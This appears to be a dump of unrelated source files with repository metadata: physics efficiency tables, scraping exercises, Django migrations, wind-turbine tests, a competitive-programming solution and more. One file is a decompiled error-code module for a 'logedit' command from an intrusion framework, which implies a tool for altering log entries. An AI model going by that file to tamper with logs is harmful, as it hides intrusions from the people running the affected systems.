[0.947,0.945,0.941,0.934,0.762,0.935,0.936,0.922,0.919], # 40 GeV
[0.951,0.949,0.948,0.943,0.774,0.940,0.944,0.926,0.945]]) * 100. # 45 GeV
veryloose20160701 = np.array([[0.896,0.893,0.890,0.884,0.719,0.875,0.866,0.859,0.821], # 4 GeV
[0.928,0.925,0.922,0.916,0.758,0.906,0.897,0.890,0.854], # 7 GeV
[0.928,0.925,0.922,0.915,0.766,0.906,0.897,0.889,0.856], # 10 GeV
[0.958,0.950,0.932,0.925,0.829,0.920,0.925,0.909,0.876], # 15 GeV
[0.966,0.957,0.955,0.943,0.844,0.943,0.929,0.916,0.904], # 20 GeV
[0.979,0.975,0.962,0.961,0.780,0.956,0.942,0.929,0.919], # 25 GeV
[0.988,0.985,0.980,0.973,0.803,0.961,0.956,0.923,0.922], # 30 GeV
[0.988,0.986,0.984,0.981,0.834,0.976,0.971,0.963,0.960], # 35 GeV
[0.990,0.988,0.987,0.983,0.835,0.978,0.974,0.970,0.972], # 40 GeV
[0.991,0.989,0.988,0.984,0.833,0.979,0.974,0.966,0.976]]) * 100. # 45 GeV
else:
etBins = [15, 20, 30, 40, 50, 500000 ]
etaBins = [0, 0.8 , 1.37, 1.54, 2.5]
tight20160701 = np.array(
# eta 0 0.8 1.37 1.54
[[0.849, 0.83898649, 0.7945, 0.82856316] # Et 15
,[0.866025, 0.85846486, 0.7975, 0.85683684] # Et 20
,[0.892305, 0.88658649, 0.8109, 0.87986105] # Et 30
,[0.9014375, 0.89668919, 0.815, 0.89674474] # Et 40
,[0.902375, 0.90035135, 0.8235, 0.90092632]])*100. # Et 50
medium20160701 = np.array(
# eta 0 0.8 1.37 1.54
[[ 0.906125, 0.8907973, 0.8385, 0.88125263] # Et 15
,[ 0.924125, 0.91683784, 0.8438, 0.91210316] # Et 20
,[ 0.944885, 0.93741676, 0.84908, 0.92400337] # Et 30
,[ 0.948, 0.94378378, 0.85675, 0.93723947] # Et 40
,[ 0.947125, 0.94508108, 0.8595, 0.93848421]])*100. # Et 50
loose20160701 = np.array(
# eta 0 0.8 1.37 1.54
[[ 0.9425, 0.93227027, 0.876, 0.9196 ] # Et 15
,[ 0.95465, 0.94708108, 0.8706, 0.93477684] # Et 20
,[ 0.96871, 0.96318919, 0.87894, 0.95187642] # Et 30
,[ 0.97425, 0.97103378, 0.884, 0.96574474] # Et 40
,[ 0.97525, 0.97298649, 0.887, 0.96703158]])*100. # Et 50
veryloose20160701 = np.array(
# eta 0 0.8 1.37 1.54
[[ 0.978, 0.96458108, 0.9145, 0.95786316]
,[ 0.98615, 0.97850541, 0.9028, 0.96738947]
,[ 0.99369, 0.9900427, 0.90956, 0.97782105]
,[ 0.995, 0.99293919, 0.917, 0.98623421]
,[ 0.99525, 0.99318919, 0.9165, 0.98582632]])*100.
#etaBins = [0, 0.8]
def standardRef( val ):
return np.array( val )
def transformToEFCalo( val ):
return np.array( val ) + (1 - np.array( val ) ) / 2
def mergeEffTable( val ):
import itertools
shape = val.shape
#shorterEtaEffTable = np.zeros( shape=(shape[0], 4) )
# eta 0.0, 0.6, 0.8, 0.15, 1.37, 1.52, 1.81, 2.01, 2.37
#for etIdx, etaIdx in itertools.product( range( shape[0] ), range( 4 ) ):
# if etaIdx == 0: # merge 0 -> .6 -> .8
# shorterEtaEffTable[etIdx,etaIdx] = ( val[etIdx,0]*.6 + val[etIdx,1]*.2 ) / .8
# if etaIdx == 1: # merge 1.15 -> 1.37 -> 1.52
# shorterEtaEffTable[etIdx,etaIdx] = ( val[etIdx,2]*.22 + val[etIdx,3]*.15 ) / .37
# if etaIdx == 2: # 1.37 -> 1.52
# shorterEtaEffTable[etIdx,etaIdx] = val[etIdx,4]
# if etaIdx == 3: # merge 1.52 -> 1.8 -> 2.47
# shorterEtaEffTable[etIdx,etaIdx] = ( val[etIdx,5]*.29 + val[etIdx,6]*.2 + val[etIdx,7]*.46 )/(.95)
shorterEffTable = np.zeros( shape=(4,9) )
for etIdx, etaIdx in itertools.product( range(4), range(9) ):
refIdx = etIdx + 3
if etIdx == 0: # 15 up to 20
shorterEffTable[etIdx,etaIdx] = val[refIdx,etaIdx]
if etIdx == 1: # merge 20, 25
shorterEffTable[etIdx,etaIdx] = (val[refIdx,etaIdx]*.4 + val[refIdx+1,etaIdx]*.6)
if etIdx == 2: # merge 30, 35
shorterEffTable[etIdx,etaIdx] = (val[refIdx+1,etaIdx]*.48 + val[refIdx+2,etaIdx]*.52)
if etIdx == 3: # merge 40, 45
shorterEffTable[etIdx,etaIdx] = (val[refIdx+2,etaIdx]*.5 + val[refIdx+3,etaIdx]*.5)
return shorterEffTable
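# Net effect of mergeEffTable (descriptive sketch): the 10-row reference
# table (4-50 GeV in 5 GeV steps) x 9 eta bins is collapsed into a 4 x 9
# table matching the four analysis etBins, using weighted averages of
# adjacent 5 GeV rows.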
#for ref in (veryloose20160701, loose20160701, medium20160701, tight20160701):
ref = veryloose20160701
from RingerCore import traverse
if useLHBins:
pdrefs = mergeEffTable( ref )
else:
pdrefs = ref
print pdrefs
pfrefs = np.array( [[0.05]*len(etaBins)]*len(etBins) )*100. # 3 5 7 10
efficiencyValues = np.array([np.array([refs]) for refs in zip(traverse(pdrefs,tree_types=(np.ndarray),simple_ret=True)
,traverse(pfrefs,tree_types=(np.ndarray),simple_ret=True))]).reshape(pdrefs.shape + (2,) )
print efficiencyValues
basePath = '/home/wsfreund/CERN-DATA'
sgnInputFile = 'user.jodafons.mc15_13TeV.361106.PowhegPythia8EvtGen_AZNLOCTEQ6L1_Zee.merge.AOD.e3601_s2876_r7917_r7676.dump.trigPB.p0200_GLOBAL/'
bkgInputFile = 'user.jodafons.mc15_13TeV.423300.Pythia8EvtGen_A14NNPDF23LO_perf_JF17.merge.AOD.e3848_s2876_r7917_r7676.dump.trigEL.p0201_GLOBAL/'
outputFile = 'mc15_13TeV.361106.423300.sgn.trigegprobes.bkg.vetotruth.trig.l2calo.eg.std.grid.veryloose'
treePath = ["HLT/Egamma/Expert/support/probes",
"HLT/Egamma/Expert/support/trigger"]
#crossValPath = 'crossValid_5sorts.pic.gz'
#from TuningTools import CrossValidArchieve
#with CrossValidArchieve( crossValPath ) as CVArchieve:
# crossVal = CVArchieve
# del CVArchieve
import os.path
from TuningTools import Reference, RingerOperation
from TuningTools import createData
from RingerCore import LoggingLevel
createData( sgnFileList = os.path.join( basePath, sgnInputFile ),
bkgFileList = os.path.join( basePath, bkgInputFile ),
ringerOperation = RingerOperation.L2Calo,
referenceSgn = Reference.AcceptAll,
referenceBkg = Reference.Truth,
treePath = treePath,
pattern_oFile = outputFile,
#nClusters = 1000,
etBins = etBins,
etaBins = etaBins,
toMatlab = True,
efficiencyValues = efficiencyValues,
plotProfiles = True,
supportTriggers = True,
doMonitoring = False,
#level = LoggingLevel.VERBOSE
)
| [
"[email protected]"
] | |
0ff42ffdcd69c859b093f5e2f320ba03debf77c8 | fea9e7fc8b5ae1752a8917f415ddfcadc62ae540 | /practice/week2/css-selector/sel_books.py | 9e571bd96e24c0ce80be33267c1c92621b9eed3f | [] | no_license | Dadajon/dl-with-big-data | fc85e0dd13aa857b89c9b707faabcfc69b51fe24 | 8e7b543948be0773550a114dc6467627c88e445f | refs/heads/main | 2023-07-26T05:43:02.901241 | 2021-09-09T06:09:43 | 2021-09-09T06:09:43 | 328,919,918 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | from bs4 import BeautifulSoup
fp = open("books.html", encoding='utf-8')
soup = BeautifulSoup(fp, 'html.parser')
sel = lambda q: print(soup.select_one(q).string)
sel("#nu") # id로 찾는 방법
sel("li#nu") # id와 tag로 찾는 방법
sel("ul > li#nu") # 부모 tag로 id와 tag로 찾는 방법
sel("#bible #nu") # id로 아래의 id를 찾는 방법
sel("#bible > #nu") # id 끼리 부모자식 관계를 나타낸것
sel("ul#bible > li#nu") #
sel("li[id='nu']")
sel("li:nth-of-type(4)")
print(soup.select("li")[3].string)
print(soup.find_all("li")[3].string) | [
"[email protected]"
] | |
4dd2952b692d1eb7f9535151212982a8483654d6 | 0bf183f870d39037a254695b163c833512a826f8 | /wapps/migrations/0016_auto_20161024_0925.py | 5799f374b78a09d39052c63d158a41562f899572 | [
"MIT"
] | permissive | apihackers/wapps | 47c57a762aec89bc398a152763a2b26005d8ffdc | e8158747aa3d77246d41142580faf9a5f2b0d968 | refs/heads/master | 2022-06-19T19:40:28.615502 | 2018-05-02T12:42:51 | 2018-05-02T12:42:51 | 59,942,417 | 7 | 2 | MIT | 2022-05-21T21:45:25 | 2016-05-29T12:40:01 | Python | UTF-8 | Python | false | false | 723 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-24 09:25
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
from wapps.utils import get_image_model
class Migration(migrations.Migration):
dependencies = [
('wapps', '0015_identitysettings_amp_logo'),
]
operations = [
migrations.AlterField(
model_name='identitysettings',
name='amp_logo',
            field=models.ForeignKey(blank=True, help_text='A mobile-optimized logo that must be 600x60', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=get_image_model(), verbose_name='Mobile Logo'),
),
]
| [
"[email protected]"
] | |
12a314df473b007e01fcd646a5de9d22189aca4b | 9b7d1472086eed304320312043a95610a39baf9c | /easy_maps/migrations/0001_initial.py | 63a5e3ffb746437d92af2bbe813d7a74e7c6e4bc | [
"MIT"
] | permissive | duct-tape/django-easy-maps | 1831785952c5ef40028197d5ab618074b5a6053a | 790196fcb5652a76a64f7f513c4c4ef4a1c905df | refs/heads/master | 2020-05-28T05:14:18.312914 | 2019-04-21T04:40:29 | 2019-04-21T04:40:29 | 188,890,561 | 0 | 0 | MIT | 2019-05-27T18:20:17 | 2019-05-27T18:20:16 | null | UTF-8 | Python | false | false | 1,103 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Address',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('address', models.CharField(unique=True, max_length=255, verbose_name='address')),
('computed_address', models.CharField(max_length=255, null=True, verbose_name='computed address', blank=True)),
('latitude', models.FloatField(null=True, verbose_name='latitude', blank=True)),
('longitude', models.FloatField(null=True, verbose_name='longitude', blank=True)),
('geocode_error', models.BooleanField(default=False, verbose_name='geocode error')),
],
options={
'verbose_name': 'EasyMaps Address',
'verbose_name_plural': 'Address Geocoding Cache',
},
),
]
| [
"[email protected]"
] | |
64ccdd263ca98e95b24a5cf753dcf440d430245d | 10e1a046d2fb02d0742364c5d2ca3a40f9380416 | /py_wake/tests/test_windturbines/test_generic_wind_turbines.py | 0dec1eb35265b6ee19a256e891ed3db51e58c090 | [
"MIT"
] | permissive | Bowen-Du/PyWake | e1c407d4ff20101c95c28cd856faec729b414320 | 9a3c9a85f50082da01286b2dc8551a4e8f5fc037 | refs/heads/master | 2023-06-10T20:36:00.213649 | 2021-07-02T11:43:51 | 2021-07-02T13:14:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,371 | py | from py_wake.examples.data.hornsrev1 import V80, Hornsrev1Site
from py_wake.wind_turbines._wind_turbines import WindTurbine
from py_wake.wind_turbines.generic_wind_turbines import GenericWindTurbine, GenericTIRhoWindTurbine
from py_wake.examples.data import wtg_path
from py_wake.examples.data.dtu10mw import DTU10MW
import numpy as np
import matplotlib.pyplot as plt
from py_wake.tests import npt
import pytest
from py_wake.deficit_models.noj import NOJ
from py_wake.site.xrsite import XRSite
def test_GenericWindTurbine():
for ref, ti, p_tol, ct_tol in [(V80(), .1, 0.03, .16),
(WindTurbine.from_WAsP_wtg(wtg_path + "Vestas V112-3.0 MW.wtg"), .05, 0.035, .07),
(DTU10MW(), .05, 0.06, .13)]:
power_norm = ref.power(np.arange(10, 20)).max()
wt = GenericWindTurbine('Generic', ref.diameter(), ref.hub_height(), power_norm / 1e3,
turbulence_intensity=ti, ws_cutin=None)
if 0:
u = np.arange(0, 30, .1)
p, ct = wt.power_ct(u)
plt.plot(u, p / 1e6, label='Generic')
plt.plot(u, ref.power(u) / 1e6, label=ref.name())
plt.ylabel('Power [MW]')
plt.legend()
ax = plt.twinx()
ax.plot(u, ct, '--')
ax.plot(u, ref.ct(u), '--')
plt.ylabel('Ct')
plt.show()
u = np.arange(5, 25)
p, ct = wt.power_ct(u)
p_ref, ct_ref = ref.power_ct(u)
# print(np.abs(p_ref - p).max() / power_norm)
npt.assert_allclose(p, p_ref, atol=power_norm * p_tol)
# print(np.abs(ct_ref - ct).max())
npt.assert_allclose(ct, ct_ref, atol=ct_tol)
@pytest.mark.parametrize(['power_idle', 'ct_idle'], [(0, 0), (100, .1)])
def test_GenericWindTurbine_cut_in_out(power_idle, ct_idle):
ref = V80()
power_norm = ref.power(15)
wt = GenericWindTurbine('Generic', ref.diameter(), ref.hub_height(), power_norm / 1e3,
turbulence_intensity=0, ws_cutin=3, ws_cutout=25, power_idle=power_idle, ct_idle=ct_idle)
if 0:
u = np.arange(0, 30, .1)
p, ct = wt.power_ct(u)
plt.plot(u, p / 1e6, label='Generic')
plt.plot(u, ref.power(u) / 1e6, label=ref.name())
plt.ylabel('Power [MW]')
plt.legend()
ax = plt.twinx()
ax.plot(u, ct, '--')
ax.plot(u, ref.ct(u), '--')
plt.ylabel('Ct')
plt.show()
assert wt.ct(2.9) == ct_idle
assert wt.power(2.9) == power_idle
assert wt.ct(25.1) == ct_idle
assert wt.power(25.1) == power_idle
def test_GenericTIRhoWindTurbine():
wt = GenericTIRhoWindTurbine('2MW', 80, 70, 2000, )
ws_lst = [11, 11, 11]
ti_lst = [0, .1, .2]
p11, ct11 = wt.power_ct(ws=ws_lst, TI_eff=ti_lst, Air_density=1.225)
p11 /= 1e6
if 0:
u = np.arange(3, 28, .1)
ax1 = plt.gca()
ax2 = plt.twinx()
for ti in ti_lst:
p, ct = wt.power_ct(u, TI_eff=ti, Air_density=1.225)
ax1.plot(u, p / 1e6, label='TI=%f' % ti)
ax2.plot(u, ct, '--')
ax1.plot(ws_lst, p11, '.')
ax2.plot(ws_lst, ct11, 'x')
print(p11.tolist())
print(ct11.tolist())
ax1.legend()
ax1.set_ylabel('Power [MW]')
ax2.set_ylabel('Ct')
plt.show()
npt.assert_array_almost_equal([1.833753, 1.709754, 1.568131], p11)
npt.assert_array_almost_equal([0.793741, 0.694236, 0.544916], ct11)
ws_lst = [10] * 3
rho_lst = [0.9, 1.225, 1.5]
p10, ct10 = wt.power_ct(ws=ws_lst, TI_eff=0.1, Air_density=rho_lst)
p10 /= 1e6
if 0:
u = np.arange(3, 28, .1)
ax1 = plt.gca()
ax2 = plt.twinx()
for rho in rho_lst:
p, ct = wt.power_ct(u, TI_eff=0.1, Air_density=rho)
ax1.plot(u, p / 1e6, label='Air density=%f' % rho)
ax2.plot(u, ct, '--')
ax1.plot(ws_lst, p10, '.')
ax2.plot(ws_lst, ct10, 'x')
print(p10.tolist())
print(ct10.tolist())
ax1.legend()
ax1.set_ylabel('Power [MW]')
ax2.set_ylabel('Ct')
plt.show()
npt.assert_array_almost_equal([1.040377569594173, 1.3934596754744593, 1.6322037609434554], p10)
npt.assert_array_almost_equal([0.7987480617157162, 0.7762418395479502, 0.7282996179383272], ct10)
| [
"[email protected]"
] | |
01d3ab118c111cade14811b445555a634d2d86f8 | 2fd0c65aa0f72133f773dac5d9a5c48fe9e26fac | /Dsz/PyScripts/Lib/dsz/mca/file/cmd/logedit/errors.py | 9078f31a6058462a9312fcb46aac6150a7228736 | [] | no_license | FingerLeakers/DanderSpritz_docs | f5d2430e0b86b1b2f0684f02ddd4fa973a5a7364 | d96b6a71c039b329f9f81544f645857c75360e7f | refs/heads/master | 2021-01-25T13:05:51.732149 | 2018-03-08T01:22:49 | 2018-03-08T01:22:49 | 123,527,268 | 2 | 0 | null | 2018-03-02T03:48:31 | 2018-03-02T03:48:30 | null | UTF-8 | Python | false | false | 1,344 | py | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.10 (default, Feb 6 2017, 23:53:20)
# [GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.34)]
# Embedded file name: errors.py
import mcl.status
ERR_SUCCESS = mcl.status.MCL_SUCCESS
ERR_INVALID_PARAM = mcl.status.framework.ERR_START
ERR_MARSHAL_FAILED = mcl.status.framework.ERR_START + 1
ERR_GET_FULL_PATH_FAILED = mcl.status.framework.ERR_START + 2
ERR_OPENFILE_FAILED = mcl.status.framework.ERR_START + 3
ERR_ALLOC_FAILED = mcl.status.framework.ERR_START + 4
ERR_WRITE_FILE_FAILED = mcl.status.framework.ERR_START + 5
ERR_UNICODE_NOT_SUPPORTED = mcl.status.framework.ERR_START + 6
ERR_NO_GOOD_LINES_FOUND = mcl.status.framework.ERR_START + 7
ERR_NO_MATCHING_LINES_FOUND = mcl.status.framework.ERR_START + 8
errorStrings = {ERR_INVALID_PARAM: 'Invalid parameter(s)',
ERR_MARSHAL_FAILED: 'Marshaling data failed',
ERR_GET_FULL_PATH_FAILED: 'Get of full file path failed',
ERR_OPENFILE_FAILED: 'Open of file failed',
ERR_ALLOC_FAILED: 'Memory allocation failed',
ERR_WRITE_FILE_FAILED: 'Write to file failed',
ERR_UNICODE_NOT_SUPPORTED: 'Unicode is not supported on this platform',
ERR_NO_GOOD_LINES_FOUND: 'No good lines found for replacement of bad lines',
ERR_NO_MATCHING_LINES_FOUND: 'No lines found with the given phrase'
} | [
"[email protected]"
] | |
3ce562a5e5b5881b87d936099c74eb0efc486b7b | 05de912d5579e031a8ccaeb9b8ea70f1431b82ad | /mopidy/audio/mixers/__init__.py | feaccc3d077f9d2b34cbf8dfeb1dad65870713f2 | [
"Apache-2.0"
] | permissive | cave-scorpion/mopidy | bcb0939ddacb0bd295ad36c2b073b369869a15cf | 5d83e3e97a47efcfa62558ba57fd394b8c311aa6 | refs/heads/master | 2021-01-16T22:16:21.134218 | 2013-03-31T14:59:30 | 2013-03-31T14:59:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 479 | py | from __future__ import unicode_literals
import pygst
pygst.require('0.10')
import gst
import gobject
from .auto import AutoAudioMixer
from .fake import FakeMixer
from .nad import NadMixer
def register_mixer(mixer_class):
gobject.type_register(mixer_class)
gst.element_register(
mixer_class, mixer_class.__name__.lower(), gst.RANK_MARGINAL)
def register_mixers():
register_mixer(AutoAudioMixer)
register_mixer(FakeMixer)
register_mixer(NadMixer)
| [
"[email protected]"
] | |
e6ba65a1e4349381acba5c01404dcd17efb2c8d3 | f023692f73992354a0b7823d9c49ae730c95ab52 | /AtCoderBeginnerContest/1XX/186/E_another.py | 5cd6db2ce83b44b90602978bdf66cc3d4f96d6b5 | [] | no_license | corutopi/AtCorder_python | a959e733f9a3549fab7162023e414ac2c99c4abe | a2c78cc647076071549e354c398155a65d5e331a | refs/heads/master | 2023-08-31T09:40:35.929155 | 2023-08-20T06:19:35 | 2023-08-20T06:19:35 | 197,030,129 | 1 | 0 | null | 2022-06-22T04:06:28 | 2019-07-15T15:57:34 | Python | UTF-8 | Python | false | false | 1,876 | py | """
以下を参考に作成
https://twitter.com/kyopro_friends/status/1341216644727676928
s + k * x ≡ 0 mod n を解く(xを求める).
鳥の巣原理から x <= n のため,
x = im + j (0 <= i, j <= m = n**0.5)
と表せる.
j が 0 ~ m の時の位置(s + k * j mod n)を前計算し,mapに持っておく(jmap).
s + k * (im + j) ≡ 0 mod n
s + k * j + k * im ≡ 0 mod n
((s + k * j) mod n) + (k * im mod n) = n or 0 ≡ 0 mod n
と表せるため, ある i に対して
(k * im mod n) + p = n or 0
となるような p が jmap に存在していれば, その時の im + j が答えとなる.
これを i が 0 ~ m の範囲で全探索し, 存在していなければ -1 となる.
@Baby-Step Giant-Step
"""
# import sys
# sys.setrecursionlimit(10 ** 6)
# import bisect
# from collections import deque
from collections import Counter
inf = float('inf')
mod = 10 ** 9 + 7
# from decorator import stop_watch
#
#
# @stop_watch
def solve(T, NSK):
for n, s, k in NSK:
m = int(n ** 0.5) + 1
jmap = {}
for j in range(m):
tmp = (s + k * j) % n
jmap.setdefault(tmp, j)
jmap[tmp] = min(j, jmap[tmp])
for i in range(m):
tmp = (n - (k * i * m) % n) % n
if jmap.get(tmp, - 1) >= 0:
print(i * m + jmap[tmp])
break
else:
print(-1)
if __name__ == '__main__':
T = int(input())
NSK = [[int(i) for i in input().split()] for _ in range(T)]
solve(T, NSK)
# # test
# from random import randint
# import tool.testcase as tt
# from tool.testcase import random_str, random_ints
# T = 100
# NSK = []
# for _ in range(T):
# N = randint(1, 10 ** 9)
# S = randint(1, N - 1)
# K = randint(1, 10 ** 9)
# NSK.append([N, S, K])
# solve(T, NSK)
| [
"[email protected]"
] | |
61b606c1dfe74cfc71a5244dcf12c871c3d47dee | 1fea3ad1608fbe8d7a695176ce001c32992baab4 | /web_scraping/ec2files/ec2file0.py | bdcb33fe4e712a9908fed1ce7a984655bbc9e087 | [
"MIT"
] | permissive | cmgospod/Groa | 2119714f57bb911d5c9c91597a1b6558448d5dd6 | 31b3624bfe61e772b55f8175b4e95d63c9e67966 | refs/heads/master | 2021-01-02T08:06:29.570942 | 2020-02-07T20:10:54 | 2020-02-07T20:10:54 | 239,560,447 | 1 | 0 | MIT | 2020-02-10T16:38:32 | 2020-02-10T16:38:31 | null | UTF-8 | Python | false | false | 109 | py | from scraper import *
s = Scraper(start=0, end=1781, max_iter=30, scraper_instance=0)
s.scrape_letterboxd() | [
"[email protected]"
] | |
a3b8e7c2bd30a297c6acbb500964593d46332088 | 3d82768d4f912eb940a1238a3b6347c727e52558 | /expense/migrations/0004_auto_20201024_1825.py | 83e59278f488ec0faee9c08743a0a6ee6c64bc63 | [] | no_license | surajit003/tdd-expense-app | b4dd53c1328f4dd40b39593e09f8afe9e811ff4a | 603c6f56ce35944c1acf8deefd6d7b420576e65d | refs/heads/main | 2023-01-08T16:01:42.102279 | 2020-11-08T20:47:04 | 2020-11-08T20:47:04 | 305,830,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py | # Generated by Django 3.1.2 on 2020-10-24 18:25
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("expense", "0003_auto_20201024_1816")]
operations = [
migrations.AlterField(
model_name="expense",
name="expense_id",
field=models.CharField(
default="d3ccef36-3709-4d60-b5fe-d673ee9d3933",
max_length=120,
primary_key=True,
serialize=False,
),
),
migrations.AlterField(
model_name="expense",
name="total",
field=models.FloatField(blank=True, null=True, verbose_name="Total"),
),
]
| [
"[email protected]"
] | |
7514b141abc126e5037f7efc1213d03689bc0d9c | e7a87d9eca87d8be7b23b3a57c1d49f0ad6d20bc | /django_evolution/tests/test_evolution_graph.py | 6605ada4d37302b6934cfd1385ab441c14c50fee | [
"BSD-2-Clause"
] | permissive | beanbaginc/django-evolution | 19a775a223b61861f503925216fb236b822122c0 | 756eedeacc41f77111a557fc13dee559cb94f433 | refs/heads/master | 2023-06-22T07:25:32.401292 | 2022-11-10T03:23:50 | 2022-11-10T03:23:50 | 14,189,401 | 22 | 13 | null | 2015-01-07T01:15:08 | 2013-11-07T00:04:43 | Python | UTF-8 | Python | false | false | 24,833 | py | """Unit tests for django_evolution.utils.graph.EvolutionGraph."""
from __future__ import unicode_literals
from django.db import DEFAULT_DB_ALIAS, connections
from django_evolution.compat.apps import get_app
from django_evolution.models import Evolution, Version
from django_evolution.support import supports_migrations
from django_evolution.tests.base_test_case import (MigrationsTestsMixin,
TestCase)
from django_evolution.tests.decorators import requires_migrations
from django_evolution.tests.evolutions_app.models import EvolutionsAppTestModel
from django_evolution.tests.evolutions_app2.models import \
EvolutionsApp2TestModel
from django_evolution.utils.graph import EvolutionGraph
from django_evolution.utils.migrations import (MigrationExecutor,
MigrationList,
MigrationLoader,
record_applied_migrations)
try:
# Django >= 1.7
from django.db import migrations
from django.db.migrations.graph import MigrationGraph
except ImportError:
# Django < 1.7
MigrationGraph = None
migrations = None
class EvolutionGraphTests(MigrationsTestsMixin, TestCase):
"""Unit tests for django_evolution.utils.graph.EvolutionGraph."""
def test_add_evolutions(self):
"""Testing EvolutionGraph.add_evolutions"""
app = get_app('django_evolution')
evolutions = [
Evolution(app_label='django_evolution',
label='my_evolution1'),
Evolution(app_label='django_evolution',
label='my_evolution2'),
]
graph = EvolutionGraph()
graph.add_evolutions(
app=app,
evolutions=evolutions,
new_models=[
Evolution,
Version,
],
extra_state={
'foo': 'bar',
})
graph.finalize()
nodes = graph.get_ordered()
self.assertEqual(len(nodes), 6)
self._check_node(
nodes[0],
insert_index=0,
key='evolution:django_evolution:__first__',
required_by={
'create-model:django_evolution:evolution',
},
state={
'anchor': True,
'app': app,
})
self._check_node(
nodes[1],
insert_index=1,
key='create-model:django_evolution:evolution',
dependencies={
'evolution:django_evolution:__first__'
},
required_by={
'create-model:django_evolution:version',
},
state={
'app': app,
'foo': 'bar',
'model': Evolution,
'type': graph.NODE_TYPE_CREATE_MODEL,
})
self._check_node(
nodes[2],
insert_index=2,
key='create-model:django_evolution:version',
dependencies={
'create-model:django_evolution:evolution'
},
required_by={
'evolution:django_evolution:my_evolution1',
},
state={
'app': app,
'foo': 'bar',
'model': Version,
'type': graph.NODE_TYPE_CREATE_MODEL,
})
self._check_node(
nodes[3],
insert_index=3,
key='evolution:django_evolution:my_evolution1',
dependencies={
'create-model:django_evolution:version'
},
required_by={
'evolution:django_evolution:my_evolution2',
},
state={
'app': app,
'evolution': evolutions[0],
'foo': 'bar',
'type': graph.NODE_TYPE_EVOLUTION,
})
self._check_node(
nodes[4],
insert_index=4,
key='evolution:django_evolution:my_evolution2',
dependencies={
'evolution:django_evolution:my_evolution1'
},
required_by={
'evolution:django_evolution:__last__',
},
state={
'app': app,
'evolution': evolutions[1],
'foo': 'bar',
'type': graph.NODE_TYPE_EVOLUTION,
})
self._check_node(
nodes[5],
insert_index=5,
key='evolution:django_evolution:__last__',
dependencies={
'evolution:django_evolution:my_evolution2'
},
state={
'anchor': True,
'app': app,
})
@requires_migrations
def test_add_migration_plan(self):
"""Testing EvolutionGraph.add_migration_plan"""
class TestsInitialMigration(migrations.Migration):
pass
class TestsAddFieldMigration(migrations.Migration):
dependencies = [
('tests', '0001_initial'),
]
class OtherInitialMigration(migrations.Migration):
dependencies = [('tests', '0002_add_field')]
graph = EvolutionGraph()
migration_plan = self._add_migrations(
graph=graph,
migrations_info=[
('tests', '0001_initial', TestsInitialMigration),
('tests', '0002_add_field', TestsAddFieldMigration),
('other', '0001_initial', OtherInitialMigration),
],
leaf_migration_targets=[('other', '0001_initial')])
self.assertEqual(len(migration_plan), 3)
graph.finalize()
nodes = graph.get_ordered()
self.assertEqual(len(nodes), 3)
self._check_node(
nodes[0],
insert_index=0,
key='migration:tests:0001_initial',
required_by={
'migration:tests:0002_add_field',
},
state={
'migration_plan_item': migration_plan[0],
'migration_target': ('tests', '0001_initial'),
'type': graph.NODE_TYPE_MIGRATION,
})
self._check_node(
nodes[1],
insert_index=1,
key='migration:tests:0002_add_field',
dependencies={
'migration:tests:0001_initial',
},
required_by={
'migration:other:0001_initial',
},
state={
'migration_plan_item': migration_plan[1],
'migration_target': ('tests', '0002_add_field'),
'type': graph.NODE_TYPE_MIGRATION,
})
self._check_node(
nodes[2],
key='migration:other:0001_initial',
dependencies={
'migration:tests:0002_add_field',
},
state={
'migration_plan_item': migration_plan[2],
'migration_target': ('other', '0001_initial'),
'type': graph.NODE_TYPE_MIGRATION,
})
def test_mark_evolutions_applied(self):
"""Testing EvolutionGraph.mark_evolutions_applied"""
app_label = 'app_deps_app'
app = get_app(app_label)
evolutions = [
Evolution(app_label=app_label,
label='test_evolution'),
]
graph = EvolutionGraph()
graph.process_migration_deps = False
graph.add_evolutions(app=app,
evolutions=evolutions)
graph.mark_evolutions_applied(app=get_app('evolutions_app'),
evolution_labels=['first_evolution'])
graph.mark_evolutions_applied(app=get_app('evolutions_app2'),
evolution_labels=['second_evolution'])
graph.finalize()
nodes = graph.get_ordered()
self.assertEqual(len(nodes), 3)
self._check_node(
nodes[0],
insert_index=0,
key='evolution:app_deps_app:__first__',
required_by={
'evolution:app_deps_app:test_evolution',
},
state={
'anchor': True,
'app': app,
})
self._check_node(
nodes[1],
insert_index=1,
key='evolution:app_deps_app:test_evolution',
dependencies={
'evolution:app_deps_app:__first__',
},
required_by={
'evolution:app_deps_app:__last__',
},
state={
'app': app,
'evolution': evolutions[0],
'type': graph.NODE_TYPE_EVOLUTION,
})
self._check_node(
nodes[2],
insert_index=2,
key='evolution:app_deps_app:__last__',
dependencies={
'evolution:app_deps_app:test_evolution',
},
state={
'anchor': True,
'app': app,
})
@requires_migrations
def test_mark_migrations_applied(self):
"""Testing EvolutionGraph.mark_migrations_applied"""
class TestsInitialMigration(migrations.Migration):
pass
class TestsAddFieldMigration(migrations.Migration):
dependencies = [
('tests', '0001_initial'),
]
class OtherInitialMigration(migrations.Migration):
dependencies = [('tests', '0002_add_field')]
graph = EvolutionGraph()
migration_plan = self._add_migrations(
graph=graph,
migrations_info=[
('tests', '0001_initial', TestsInitialMigration),
('tests', '0002_add_field', TestsAddFieldMigration),
('other', '0001_initial', OtherInitialMigration),
],
leaf_migration_targets=[('other', '0001_initial')],
mark_applied=[
('tests', '0001_initial'),
('tests', '0002_add_field'),
])
self.assertEqual(len(migration_plan), 1)
graph.finalize()
nodes = graph.get_ordered()
self.assertEqual(len(nodes), 1)
self._check_node(
nodes[0],
insert_index=0,
key='migration:other:0001_initial',
state={
'migration_plan_item': migration_plan[0],
'migration_target': ('other', '0001_initial'),
'type': graph.NODE_TYPE_MIGRATION,
})
